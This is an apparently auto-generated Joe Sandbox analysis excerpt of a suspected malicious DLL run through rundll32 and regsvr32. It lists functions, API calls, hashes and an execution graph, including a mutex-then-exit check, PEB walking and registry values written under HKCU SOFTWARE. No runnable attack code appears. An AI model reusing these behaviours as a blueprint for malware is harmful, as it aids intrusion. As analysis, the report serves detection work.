                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: c30f9b567104404dfa8ae9d4df645edb39a04e41f82f7852530594daf0097da2
                          • Instruction ID: 8a9dd7038f33dcf1bd7a92af22f95d711d07eae44bddefa1f9fd5bda63df9031
                          • Opcode Fuzzy Hash: c30f9b567104404dfa8ae9d4df645edb39a04e41f82f7852530594daf0097da2
                          • Instruction Fuzzy Hash: C551D3756083069FDB168F20D990BAA77B9EF08314F10853DEE03C72A9D739E851C791
                          Function 7FAD46EF Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7FAD439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7FAD4226,?,00000000,-00000008), ref: 7FAD4449
                          • GetLastError.KERNEL32 ref: 7FAD4753
                          • __dosmaperr.LIBCMT ref: 7FAD475A
                          • GetLastError.KERNEL32(?,?,?,?), ref: 7FAD4794
                          • __dosmaperr.LIBCMT ref: 7FAD479B
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 205a0f80856a9c2ddc27d671197828cf8527b91eb51457dabe6d0e894a745c4b
                          • Instruction ID: f25a9bfa4fddc404feb59273131b5b7cac6e1140e50008794cdc8c406fcdc06d
                          • Opcode Fuzzy Hash: 205a0f80856a9c2ddc27d671197828cf8527b91eb51457dabe6d0e894a745c4b
                          • Instruction Fuzzy Hash: 5621B075608305EFD7118F76C98495BB7BAFF492647104599FC669B25CDB38FC008B50
                          Function 7FACCB33 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3945016288d2dcfde4e005cafe3da8d2a1a9840d356e486c62dc01fae8f7b20c
                          • Instruction ID: a9986fd089c3559709215faf918ecd0ea8e15868c2d718a4309de075c151de64
                          • Opcode Fuzzy Hash: 3945016288d2dcfde4e005cafe3da8d2a1a9840d356e486c62dc01fae8f7b20c
                          • Instruction Fuzzy Hash: 7921C0352043A5AFDB029FB5CD80E5A77AEEF042647005529FD16EB268EB38FC51D7A0
                          Function 7FAD55FD Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 7FAD5605
                            • Part of subcall function 7FAD439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7FAD4226,?,00000000,-00000008), ref: 7FAD4449
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7FAD563D
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7FAD565D
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 6391fecc80515c5d02f25e0281213e92ab951cda9330182307eaf337a46be150
                          • Instruction ID: 66c3c6d692dd4f3e49dac446ea0b86ddae88538946c4f862d04493e1e993d5cd
                          • Opcode Fuzzy Hash: 6391fecc80515c5d02f25e0281213e92ab951cda9330182307eaf337a46be150
                          • Instruction Fuzzy Hash: 8F1126BA909305BEEB021BB64D8DCAF7ABCCE591A53180124F906D610CFF3CED0186B4
                          Function 7FADC3D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000), ref: 7FADC3F0
                          • GetLastError.KERNEL32(?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000,?,?,?,7FAD8D75,?), ref: 7FADC3FC
                            • Part of subcall function 7FADC3C2: CloseHandle.KERNEL32(FFFFFFFE,7FADC40C,?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000,?,?), ref: 7FADC3D2
                          • ___initconout.LIBCMT ref: 7FADC40C
                            • Part of subcall function 7FADC384: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7FADC3B3,7FADBCE5,?,?,7FAD87EE,?,?,00000000,?), ref: 7FADC397
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000,?), ref: 7FADC421
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 7f42a484c1fee0033e97d1f9bd1f4f6030498f5abe1801fab3145f14774b164c
                          • Instruction ID: 426ea828ca856fed72087b9e9d106e04e963393e43cc1c2f9a5771e9954360a0
                          • Opcode Fuzzy Hash: 7f42a484c1fee0033e97d1f9bd1f4f6030498f5abe1801fab3145f14774b164c
                          • Instruction Fuzzy Hash: 2BF01C7F500214BBCF121FA2DC09EC97F6AFB483B0B584021FE099A124D63689329BD0
                          Function 7FAC5FE5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: +$-
                          • API String ID: 3732870572-2137968064
                          • Opcode ID: 1aa46d6682d56efa9de95d442115b426db274812f65fece85fc646247afdba00
                          • Instruction ID: bd580126d8d992bad4960fb194b831cbfeb8b8e68fedb382326839ab999e817f
                          • Opcode Fuzzy Hash: 1aa46d6682d56efa9de95d442115b426db274812f65fece85fc646247afdba00
                          • Instruction Fuzzy Hash: FBA1E234E01259EECF01CF78C8506EE7BB5EF49725F048659E86AAB399D238E502CB50
                          Function 7FA93D10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                          Download Yara Rule
                          APIs
                          • std::exception::exception.LIBCONCRTD ref: 7FA93FC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: parse error$parse_error
                          • API String ID: 2807920213-1820534363
                          • Opcode ID: 3ba5f65279a86b87e52da5ec5e5d7baca1e839107f9631471fba461c9d4d72ef
                          • Instruction ID: 32a7663e0445163c79880c28695e01e41fa9aba79abf3b85cd9e2bc8352d915e
                          • Opcode Fuzzy Hash: 3ba5f65279a86b87e52da5ec5e5d7baca1e839107f9631471fba461c9d4d72ef
                          • Instruction Fuzzy Hash: D5A1F174D05258DFCB14CFA8C990AEEBBB5BF49300F1081A9E959AB354DB346A44CF90
                          Function 7FAC11B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 7FAC11DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 62cf9ab8820d68c8a1b5bd1f9f453e451ecdf64a13b70799d2e710168ae14af0
                          • Instruction ID: 19c7dfbb41d5dbd4f82694df699b52da02a8d3e6101e744aebbd20e9ce2d0998
                          • Opcode Fuzzy Hash: 62cf9ab8820d68c8a1b5bd1f9f453e451ecdf64a13b70799d2e710168ae14af0
                          • Instruction Fuzzy Hash: CF417F36A00209AFDF02CF94CD81ADEBBB5FF48324F148069F906A7264D339E951DB50
                          Function 7FA77D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA77DA3
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7FA77E6F
                            • Part of subcall function 7FABCB02: _Yarn.LIBCPMT ref: 7FABCB21
                            • Part of subcall function 7FABCB02: _Yarn.LIBCPMT ref: 7FABCB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554
                          • Opcode ID: 87b421e668195a1392fec4642af8e179e61b4fa6d09f3aa4a10415143ec2ee4b
                          • Instruction ID: 693ec5f1036f896538a896af005808075848b1be17a91232fb1c6879098a12a8
                          • Opcode Fuzzy Hash: 87b421e668195a1392fec4642af8e179e61b4fa6d09f3aa4a10415143ec2ee4b
                          • Instruction Fuzzy Hash: 5F4127B4D05289DFDB01CFA8C950BAEFBF1BF49304F148298D414AB385C77AA901CBA5

                          Execution Graph

                          Execution Coverage:1%
                          Dynamic/Decrypted Code Coverage:97.4%
                          Signature Coverage:0%
                          Total number of Nodes:116
                          Total number of Limit Nodes:1
                          execution_graph 34305 7f07da05 96 API calls __DllMainCRTStartup@12 34306 7f096a0c 43 API calls 3 library calls 34222 7f090f1d 6 API calls std::_Lockit::_Lockit 34226 7f08d517 55 API calls 2 library calls 34313 7f022020 44 API calls 34317 7f091827 44 API calls 34320 7f056830 74 API calls 34239 7f07dd45 97 API calls 2 library calls 34328 7f04d840 56 API calls 34331 7f07d04d DeleteCriticalSection 34242 6c3f9870 5 API calls _ValidateLocalCookies 34333 7f02d650 84 API calls Concurrency::cancellation_token_source::~cancellation_token_source 34334 7f02c450 83 API calls 3 library calls 34336 7f08c05f 7 API calls 34337 7f07d05b InitializeCriticalSectionEx 34252 7f056760 42 API calls numpunct 34254 7f09736e 46 API calls 3 library calls 34255 7f08c565 49 API calls 4 library calls 34256 6c3ebc50 GetPEB 34259 7f08137a 54 API calls 3 library calls 34263 7f04d980 11 API calls 34353 7f049480 276 API calls 3 library calls 34356 7f07d08c DecodePointer 34268 7f07e593 51 API calls 2 library calls 34269 7f09139d FreeLibrary 34273 7f037fa0 41 API calls ___std_exception_copy 34274 7f0393a0 14 API calls ___std_type_info_destroy_list 34366 7f095caf 45 API calls 2 library calls 34370 7f0570b0 71 API calls 2 library calls 34281 7f07c9b0 16 API calls 2 library calls 34282 7f0947b5 48 API calls 4 library calls 34283 6c3f8480 6 API calls 3 library calls 34376 7f0574c0 50 API calls ctype 34287 7f0975c1 44 API calls 3 library calls 34102 7f07afe0 34120 7f047a60 34102->34120 34108 7f07b029 34109 7f07b058 GetPEB 34108->34109 34110 7f07b0a1 34109->34110 34178 7f047920 CreateMutexA 34110->34178 34113 7f07b250 ExitProcess 34114 7f07b258 GetPEB 34115 7f07b30f 34114->34115 34182 7f032100 GetPEB 34115->34182 34117 7f07b4f0 34183 7f032370 GetPEB 34117->34183 34119 7f07b502 34121 7f047a7f 34120->34121 34184 7f0322b0 34121->34184 34123 7f047c7f 34125 7f0322b0 GetPEB 34123->34125 34128 7f047ddc 34125->34128 34127 7f047f4c 34129 7f0322b0 GetPEB 34127->34129 34128->34127 34201 7f031f50 GetPEB 34128->34201 34132 7f0480b4 34129->34132 34131 7f048241 34133 7f0322b0 GetPEB 34131->34133 34132->34131 34202 7f031f50 GetPEB 34132->34202 34136 7f048394 34133->34136 34135 7f0484fa 34137 7f0322b0 GetPEB 34135->34137 34136->34135 34203 7f031f50 GetPEB 34136->34203 34140 7f04864d 34137->34140 34139 7f0487b3 34142 7f0322b0 GetPEB 34139->34142 34140->34139 34204 7f031f50 GetPEB 34140->34204 34145 7f04892d 34142->34145 34143 7f048a81 34188 7f03fd90 34143->34188 34145->34143 34205 7f031f50 GetPEB 34145->34205 34146 7f048a93 34192 7f032310 34146->34192 34150 7f048afd 34196 7f0403f0 34150->34196 34153 7f048b0f 34156 7f032310 GetPEB 34153->34156 34154 7f048ad5 34207 7f0320d0 GetPEB 34154->34207 34157 7f048b30 34156->34157 34158 7f048b79 34157->34158 34208 7f03b630 44 API calls swprintf 34157->34208 34158->34119 34162 7f052a30 34158->34162 34160 7f048b51 34209 7f0320d0 GetPEB 34160->34209 34164 7f052a63 34162->34164 34163 7f052ac2 GetPEB 34166 7f052b51 34163->34166 34164->34163 34165 7f052da0 GetPEB 34167 7f052e32 GetPEB 34165->34167 34166->34165 34169 7f05307f GetPEB 34167->34169 34173 7f0532a0 PathIsDirectoryW 34169->34173 34172 7f053477 34172->34119 34174 7f03c9e0 34172->34174 34173->34172 34175 7f03cad9 34174->34175 34177 7f03ca54 swprintf 34174->34177 34175->34108 34214 7f07d78c 44 API calls 34177->34214 34179 7f04793f GetLastError 34178->34179 34180 7f04793b 34178->34180 34179->34180 34181 7f04794c CloseHandle 34179->34181 34180->34113 34180->34114 34181->34180 34182->34117 34183->34119 34185 7f0322ce 34184->34185 34186 7f0322bc 34184->34186 34185->34123 34200 7f031f50 GetPEB 34185->34200 34210 7f06c370 GetPEB 34186->34210 34190 7f03fe5d 34188->34190 34191 7f03fdd8 swprintf 34188->34191 34190->34146 34211 7f07d78c 44 API calls 34191->34211 34193 7f03232e 34192->34193 34194 7f03231c 34192->34194 34193->34150 34206 7f03d490 44 API calls swprintf 34193->34206 34212 7f06c370 GetPEB 34194->34212 34197 7f0404c5 34196->34197 34199 7f040440 swprintf 34196->34199 34197->34153 34213 7f07d78c 44 API calls 34199->34213 34200->34123 34201->34127 34202->34131 34203->34135 34204->34139 34205->34143 34206->34154 34207->34150 34208->34160 34209->34158 34210->34185 34211->34190 34212->34193 34213->34197 34214->34175 34296 7f07cbed 9 API calls 3 library calls 34301 7f0955fd 20 API calls 2 library calls

                          Executed Functions

                          Function 7F052A30 Relevance: 2.1, APIs: 1, Instructions: 611COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 6 7f052a30-7f052a6d call 7f03f6b0 9 7f052a78-7f052a7c 6->9 10 7f052ac2-7f052b4e GetPEB 9->10 11 7f052a7e-7f052ac0 9->11 13 7f052b51-7f052bac 10->13 11->9 14 7f052bae-7f052bb8 13->14 15 7f052bba 13->15 16 7f052bc4-7f052bd3 14->16 15->16 17 7f052cbc-7f052ce6 16->17 18 7f052bd9-7f052bdf 16->18 17->13 19 7f052cec 17->19 20 7f052be2-7f052bfb 18->20 21 7f052cf6-7f052d4b call 7f03cbf0 19->21 20->17 22 7f052c01-7f052c22 20->22 32 7f052d56-7f052d5a 21->32 23 7f052c29-7f052c40 22->23 24 7f052c42-7f052c6a 23->24 25 7f052c4d-7f052c5e 23->25 29 7f052cb7 24->29 30 7f052c6c-7f052cb5 24->30 25->23 29->20 30->21 33 7f052da0-7f052e2c GetPEB 32->33 34 7f052d5c-7f052d9e 32->34 35 7f052e32-7f052e90 33->35 34->32 37 7f052e92-7f052e9c 35->37 38 7f052e9e 35->38 39 7f052ea8-7f052eb7 37->39 38->39 40 7f052ebd-7f052ec3 39->40 41 7f052fb8-7f052fe8 39->41 42 7f052ec6-7f052edf 40->42 41->35 43 7f052fee 41->43 42->41 44 7f052ee5-7f052f09 42->44 45 7f052ff8-7f053079 GetPEB 43->45 46 7f052f13-7f052f33 44->46 50 7f05307f-7f0530dd 45->50 48 7f052f35-7f052f66 46->48 49 7f052f43-7f052f5a 46->49 54 7f052fb3 48->54 55 7f052f68-7f052fb1 48->55 49->46 52 7f0530df-7f0530e9 50->52 53 7f0530eb 50->53 56 7f0530f5-7f053104 52->56 53->56 54->42 55->45 57 7f053205-7f053235 56->57 58 7f05310a-7f053110 56->58 57->50 59 7f05323b 57->59 60 7f053113-7f05312c 58->60 61 7f053245-7f05329a GetPEB 59->61 60->57 62 7f053132-7f053156 60->62 67 7f0532a0-7f0532fe 61->67 63 7f053160-7f053180 62->63 65 7f053190-7f0531a7 63->65 66 7f053182-7f0531b3 63->66 65->63 71 7f0531b5-7f0531fe 66->71 72 7f053200 66->72 69 7f053300-7f05330a 67->69 70 7f05330c 67->70 73 7f053316-7f053325 69->73 70->73 71->61 72->60 74 7f053426-7f053456 73->74 75 7f05332b-7f053331 73->75 74->67 76 7f05345c 74->76 77 7f053334-7f05334d 75->77 78 7f053466-7f053475 PathIsDirectoryW 76->78 77->74 79 7f053353-7f053377 77->79 80 7f053477-7f05347c 78->80 81 7f05347e 78->81 82 7f053381-7f0533a1 79->82 83 7f053480-7f053483 80->83 81->83 84 7f0533b1-7f0533c8 82->84 85 7f0533a3-7f0533d4 82->85 84->82 87 7f0533d6-7f05341f 85->87 88 7f053421 85->88 87->78 88->77
                          APIs
                          • PathIsDirectoryW.SHLWAPI(?), ref: 7F05346D
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryPath
                          • String ID:
                          • API String ID: 1580926078-0
                          • Opcode ID: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction ID: 17389826c87c33014c7500b056f5e2031a418b95cb2e14d871315ac60c79fc37
                          • Opcode Fuzzy Hash: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction Fuzzy Hash: D4728E78E052698FDB69CF68C990BDDBBB2BF49304F1081DAD849A7345D730AA85CF50
                          Function 7F07AFE0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 89 7f07afe0-7f07aff3 call 7f047a60 92 7f07b512-7f07b517 89->92 93 7f07aff9-7f07b000 call 7f052a30 89->93 94 7f07b51b-7f07b51e 92->94 97 7f07b006-7f07b035 call 7f03c9e0 93->97 98 7f07b509-7f07b50e 93->98 101 7f07b037-7f07b054 call 7f053490 97->101 102 7f07b058-7f07b09e GetPEB 97->102 98->94 101->102 104 7f07b0a1-7f07b0f6 102->104 106 7f07b101 104->106 107 7f07b0f8-7f07b0ff 104->107 108 7f07b108-7f07b114 106->108 107->108 109 7f07b11a-7f07b120 108->109 110 7f07b1e8-7f07b212 108->110 111 7f07b123-7f07b136 109->111 110->104 112 7f07b218 110->112 111->110 113 7f07b13c-7f07b157 111->113 114 7f07b21f-7f07b24e call 7f047920 112->114 115 7f07b15e-7f07b175 113->115 124 7f07b250-7f07b252 ExitProcess 114->124 125 7f07b258-7f07b30c GetPEB 114->125 116 7f07b177-7f07b199 115->116 117 7f07b17f-7f07b190 115->117 122 7f07b1e3 116->122 123 7f07b19b-7f07b1e1 116->123 117->115 122->111 123->114 126 7f07b30f-7f07b36a 125->126 127 7f07b375 126->127 128 7f07b36c-7f07b373 126->128 129 7f07b37c-7f07b388 127->129 128->129 130 7f07b46e-7f07b498 129->130 131 7f07b38e-7f07b394 129->131 130->126 132 7f07b49e 130->132 133 7f07b397-7f07b3b0 131->133 134 7f07b4a5-7f07b519 call 7f032100 call 7f032370 132->134 133->130 135 7f07b3b6-7f07b3d7 133->135 134->94 136 7f07b3de-7f07b3f5 135->136 138 7f07b3f7-7f07b41f 136->138 139 7f07b402-7f07b413 136->139 143 7f07b421-7f07b467 138->143 144 7f07b469 138->144 139->136 143->134 144->133
                          APIs
                            • Part of subcall function 7F053490: __aullrem.LIBCMT ref: 7F0534E5
                            • Part of subcall function 7F047920: CreateMutexA.KERNEL32(00000000,00000001,7F07B249,?,?,7F07B249,?), ref: 7F04792C
                          • ExitProcess.KERNEL32 ref: 7F07B252
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateExitMutexProcess__aullrem
                          • String ID:
                          • API String ID: 1029110445-0
                          • Opcode ID: 96ec487803729f377fe7fd2229835f8b5939f5bcbc483f3ff1df4515a945e6be
                          • Instruction ID: c17b131a6ef136a409af4c4807dee3b767a50ad85b091d5296c8e7d360e4e52a
                          • Opcode Fuzzy Hash: 96ec487803729f377fe7fd2229835f8b5939f5bcbc483f3ff1df4515a945e6be
                          • Instruction Fuzzy Hash: F102B2B4E04259DFDB14CF98C990BEDBBB2BF48704F108199D819A7345DB34AA85CF64
                          Function 7F047920 Relevance: 4.5, APIs: 3, Instructions: 25synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,7F07B249,?,?,7F07B249,?), ref: 7F04792C
                          • GetLastError.KERNEL32(?,?,7F07B249), ref: 7F04793F
                          • CloseHandle.KERNEL32(00000000,?,?,7F07B249), ref: 7F047950
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMutex
                          • String ID:
                          • API String ID: 4294037311-0
                          • Opcode ID: 748fadf2e365375a119203f992d48ba9859be6d760b5ca3fd03736b3ae33c9c8
                          • Instruction ID: b0cd34d090d39d9dafd891b1bc2b1c0759d73882928f4a975ba4596f6873b81a
                          • Opcode Fuzzy Hash: 748fadf2e365375a119203f992d48ba9859be6d760b5ca3fd03736b3ae33c9c8
                          • Instruction Fuzzy Hash: BBE0927E52820AFFD7019FA4C808B6D36A6D709721F100964FD0ADB380D6759D60A661

                          Non-executed Functions

                          Function 7F096F5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7F08EB5C: GetLastError.KERNEL32(?,00000008,7F09360A), ref: 7F08EB60
                            • Part of subcall function 7F08EB5C: SetLastError.KERNEL32(00000000,00000000,00000009,000000FF), ref: 7F08EC02
                          • GetACP.KERNEL32(?,?,?,?,?,?,7F08F5A2,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 7F09701C
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7F08F5A2,?,?,?,00000055,?,-00000050,?,?), ref: 7F097047
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F0971AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid
                          • String ID: utf8
                          • API String ID: 607553120-905460609
                          • Opcode ID: 8a9a788638a14695c9d8d37aa400c7996261dcb9567b199aa4f99ceb779f8725
                          • Instruction ID: bf893262d0fe1792a0d40978bece3a9650b64236af0b9f770921b1385ca56f2c
                          • Opcode Fuzzy Hash: 8a9a788638a14695c9d8d37aa400c7996261dcb9567b199aa4f99ceb779f8725
                          • Instruction Fuzzy Hash: 4871E476710306EBE715DB79CC49BAA73EAEF44F10F104069E906DB380FB75E940A668
                          Function 7F091B6C Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
                          • API String ID: 3213747228-0
                          • Opcode ID: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction ID: 08749ad9730e61fcfe22759c4b83e9cdc4759d1cc4bc26827e7f3a4b094db615
                          • Opcode Fuzzy Hash: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction Fuzzy Hash: 2DB13A72B053459FDB02CF68C8817EEBBF6EF45B60F1481A5D806AB341E334A901DBA4
                          Function 7F07BB70 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F07BB99
                          • wsprintfW.USER32 ref: 7F07BBE6
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F07BC03
                          • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F07BC24
                          • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F07BC44
                          • RegCloseKey.ADVAPI32(00000000), ref: 7F07BC5D
                          • RegCloseKey.ADVAPI32(00000000), ref: 7F07BC68
                            • Part of subcall function 7F07C347: GetTickCount.KERNEL32 ref: 7F07C365
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CountCreateOpenTickwsprintf
                          • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                          • API String ID: 730945307-550109914
                          • Opcode ID: 06fb46574d1d3f0b687d6b4ca41582e3a69bedb4c397e8d362c0dc9860365070
                          • Instruction ID: c8d046bb306d82967efed45cea5e2c29490514254a8e8ca60b8d43ffc0c8ed17
                          • Opcode Fuzzy Hash: 06fb46574d1d3f0b687d6b4ca41582e3a69bedb4c397e8d362c0dc9860365070
                          • Instruction Fuzzy Hash: FC316B7AA00218BADF119AA5CC49FEFBFBDEF04754F104065F605A6160DB31AB54EBA0
                          Function 7F080E11 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 7F080F30
                          • ___TypeMatch.LIBVCRUNTIME ref: 7F08103E
                          • CatchIt.LIBVCRUNTIME ref: 7F08108F
                          • _UnwindNestedFrames.LIBCMT ref: 7F081190
                          • CallUnexpected.LIBVCRUNTIME ref: 7F0811AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 4119006552-393685449
                          • Opcode ID: 5d6f8f29d20a3c3ee350b199449e0b5f206eb64cd4b2e6d122bbbd2bd5886f2a
                          • Instruction ID: db0345cfade5ff3f699f3119811c7b319a4ccfe1a57164aafb8cb3f78f404100
                          • Opcode Fuzzy Hash: 5d6f8f29d20a3c3ee350b199449e0b5f206eb64cd4b2e6d122bbbd2bd5886f2a
                          • Instruction Fuzzy Hash: D1B12776900309EFCF16CFA4D880A9EBBB6FF04B20B10855AE8166B315D775EA51CF91
                          Function 7F07BD7C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON
